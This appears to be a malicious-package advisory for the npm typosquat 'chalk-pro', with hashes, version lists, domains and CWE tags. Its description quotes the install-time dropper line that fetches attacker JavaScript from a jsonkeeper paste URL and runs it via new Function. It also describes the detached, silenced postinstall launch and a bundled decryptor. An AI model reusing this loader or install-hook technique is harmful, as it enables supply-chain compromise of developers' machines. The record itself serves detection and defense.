-= Per source details. Do not edit below this line.=-
The package is published as 'chalk-pro' (homepage chalk-pro.com), but its main entry is a verbatim copy of nodemailer's API — a typosquat impersonating both chalk and nodemailer, with 'Andris Reinman' (the real nodemailer author) listed as author. The package.json postinstall hook runs node lib/utils/index.js, which calls child_process.spawn(process.execPath, [filePath], { detached: true, stdio: ['ignore','ignore','ignore'] }) followed by child.unref() to launch lib/utils/smtp-connection/index.js as a detached, fully silenced child, so npm install returns immediately while the dropper continues in the background. The dropper executes require('axios').get('https://www.jsonkeeper.com/b/TOAAK').then(r => new Function('require', r.data.cookie)(require)) — it fetches attacker-controlled JavaScript (read from the 'cookie' field of the JSON response) from a mutable paste host and evaluates it with new Function at install time, with full access to require. Because the paste content can be changed at any time, the code that actually ran can differ from one install to the next and is not identified by the package and file hashes recorded below, which cover only the loader. A second file (lib/utils/smtp-connection/parse.js) provides AES-256-CBC decryption with a hardcoded key and IV, positioned to decrypt follow-up stages delivered as hex. This is a classic install-time dropper: typosquat lure + detached, silenced postinstall + remote eval from a mutable third-party paste + bundled second-stage decryptor.
{
"malicious-packages-origins": [
{
"versions": [
"7.0.4"
],
"sha256": "ac66dfb6013c32d34c6ce83bdba4628b67539e81df27fe18dcf71d3de05ff8ce",
"modified_time": "2026-06-12T20:36:57Z",
"source": "amazon-inspector",
"id": "IN-MAL-2026-006231",
"import_time": "2026-06-12T20:49:38.118064947Z"
},
{
"versions": [
"7.0.4"
],
"sha256": "d6015370f610f4d4581119093958e05171cac46e967b97725e8e3ed42dad9070",
"modified_time": "2026-06-12T20:36:58Z",
"source": "amazon-inspector",
"import_time": "2026-06-12T20:49:38.195698931Z",
"id": "IN-MAL-2026-006232"
},
{
"versions": [
"7.0.6"
],
"sha256": "75bcaaf15fbc593bdf034886186f961d37758a21b9feca9c18c37338c8af34dc",
"modified_time": "2026-06-16T22:17:58Z",
"source": "amazon-inspector",
"id": "IN-MAL-2026-006840",
"import_time": "2026-06-16T23:03:43.140780104Z"
}
]
}{
"package_integrity": [
{
"filename": "chalk-pro-7.0.4.tgz",
"hashes": {
"sha512_sri": "sha512-m0gHULuyqRGU+Z2ZkyFuCDJD0YUUoENkKlzk5lY1tt97m7zFVP+79dhp4gTNtwyZ0orut7rgi+lEBNGNEWTmbg==",
"sha1": "fd1014b20c77e2d2b536d8dcef0187a949438318"
}
}
],
"evidence_files": [
{
"sha256": "1177ef44c40c048428ad64bebb0781fdf8ec303a3a4941c225efc143a54d0798",
"path": "lib/utils/smtp-connection/index.js",
"tlsh": "09e026a223e0612e223519e593060067b007c5616b6ae8c6c3585af226c1fd58e23df9"
},
{
"sha256": "9fb27c30f484650bb4a39f65a03fbccdc0b9b5f1cb84700ca73ee8893c66e06e",
"path": "lib/utils/index.js",
"tlsh": "dae0686a23533738a034cbc1da30ce3b258b8020b365a0e0f00c406a2bc72c406ea8da"
},
{
"sha256": "2b849087b5db4e7663811977e549e5cb0a76d2b3d36c1b8e0e845a45e835a6c4",
"path": "package.json",
"tlsh": "1041fc15cd268ce3279929edb86d0183b530d00f8d09b85db74c938c4f8e99f76b8a6d"
},
{
"sha256": "4aac106a4f36aba6433c7ded453d724307ee55616e240883cd46204549cf24b1",
"path": "lib/utils/smtp-connection/parse.js",
"tlsh": "7cf0a6802cb8fb900345b0e7c0bbeb07a198a068312287a48a8f9d5a45868488a130dd"
}
],
"domains": [
"github.com",
"release-assets.githubusercontent.com",
"www.jsonkeeper.com"
]
}
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/chalk-pro/MAL-2026-5711.json"
[
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
}
]